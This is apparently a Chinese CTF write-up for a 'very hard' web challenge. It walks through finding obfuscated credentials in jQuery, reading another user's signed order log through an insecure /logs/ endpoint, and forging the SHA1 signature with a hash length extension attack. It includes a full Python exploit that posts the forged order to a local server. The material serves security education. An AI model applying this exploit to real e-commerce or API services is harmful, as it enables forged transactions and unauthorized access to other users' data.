### 1.题目名称

double 12 activity



### 2.题目类型

web(very hard)



### 3.题目描述

双十二优惠活动又要开始啦，不如给你的另一半买一本《最好的语言-PHP》



### 4.考察知识点

js逆向分析，未授权访问，hash长度扩展攻击



### 5.解题思路

***1.套路与基本分析***

在login页面处发现提示：

> <!--find your password somewhere -->

 然后按照套路猜测jquery可能有问题，简单分析或者diff一下，发现：

```javascript
q[String.fromCharCode(117)+String.fromCharCode(115)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(110)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)] = "ctf";
q[String.fromCharCode(112)+String.fromCharCode(97)+String.fromCharCode(115)+String.fromCharCode(115)+String.fromCharCode(119)+String.fromCharCode(111)+String.fromCharCode(114)+String.fromCharCode(100)] = "ctf_ctf_ctf_ctf_ctf";
```

或者直接在console中输入username，password后会print出账号和密码：

 ![2](jpg\2.jpg)

直接登录后发现以下几点基本但重要的信息：

1.可以购买的栏目中有《php xxxx》，按题目提示这是我们的最终目标：

2.发现有log可以记录之前成功购买的记录；

3.题目提供一个client.py来与服务端交互，在blackbox下，这个client相关逻辑和接口可以给我们很多的提示。

***2.log处平行越权***

我们可以访问/logs/1的url来访问用户id为1的用户的订单日志：

> count=10&lat=37.351&user_id=1&long=-119.827&waffle=xxxxx|sig:6102dcc8a67f0c52c0cabe46a1c992d21cdf1c7c

这样，我们就满足了length extension attack的第二个条件，**已知某一message按照上面的算法得到的hash*，然后回过头来看我们自己的秘钥，猜测用户id=1的秘钥长度应该和我们的秘钥长度一致均为38（在不需要额外安全要求时，为了开发便利性和代码鲁棒性，开发者一般都会这样设计，如果确时是随机长度的话，我们还可以暴力猜解其长度，而且这很容易实现）。

***3.client.py脚本分析***

毫无疑问，client.py和server端生成的signature的方式肯定是一样的，定位到client.py中sign生成的代码：

```python
def _signature(self, message):
	h = hashlib.sha1()
	h.update(self.api_secret + message)
	return h.hexdigest()
```

so，很明显这种算法就是我们之前提到可以被攻击的那种方式。所有条件满足，OK，我们开始exploit。直接上代码。（此处代码中的old_hash 可以通过访问/logs/id/1获取）

```python
#!/usr/bin/env python
import hashlib
from http import http
import urllib
import os

host = '127.0.0.1'
port = 8084
old_hash = '2402bbdb924de75b343ded7c0b27198dda14ff3f'
secret_length = 38
old_string = 'count=10&lat=37.351&user_id=1&long=-119.827&waffle=%E4%B8%8D%E5%8F%AF%E6%8E%89%E8%90%BD%E7%9A%84%E5%9C%A3%E5%89%91'

def sig(msg):
    h = hashlib.sha1()
    h.update(msg)
    return h.hexdigest()

def calc(old_hash,append):
    cmd = ('hash_extender --data "'+
	    old_string
	    +'" --secret '+
	    str(secret_length)
	    + ' --append "'+
	    append
	    + '" --signature '+
	    old_hash
	    +' --format sha1'
	    )
    #print cmd
    return os.popen(cmd).read()

print 'old_string: ' + old_string + ' with hash:'
print 'old_hash: ' + old_hash
#print 'new_string: ' + new_string + ' with hash:'
res = calc(old_hash,'&waffle=%E3%80%8A%E6%9C%80%E5%A5%BD%E7%9A%84%E8%AF%AD%E8%A8%80-PHP%E3%80%8B').split('\n')
new_hash = res[2][15:]
new_string = res[3][12:].decode('hex')
print 'new_hash: ' + new_hash
print 'new_string: ' + new_string
payload = (new_string+'|sig:'+new_hash)

print '#'*78
print http('post',host,port,'/orders.php',(new_string+'|sig:'+new_hash),{})[18:56]
print '#'*78
```

调整一下前面的参数运行一下即可。hash_extender是从github上下载的，专门用于hash length extension attack，相关依赖请自行下载编译。

最终运行截图如下：

 ![1](jpg\1.jpg)









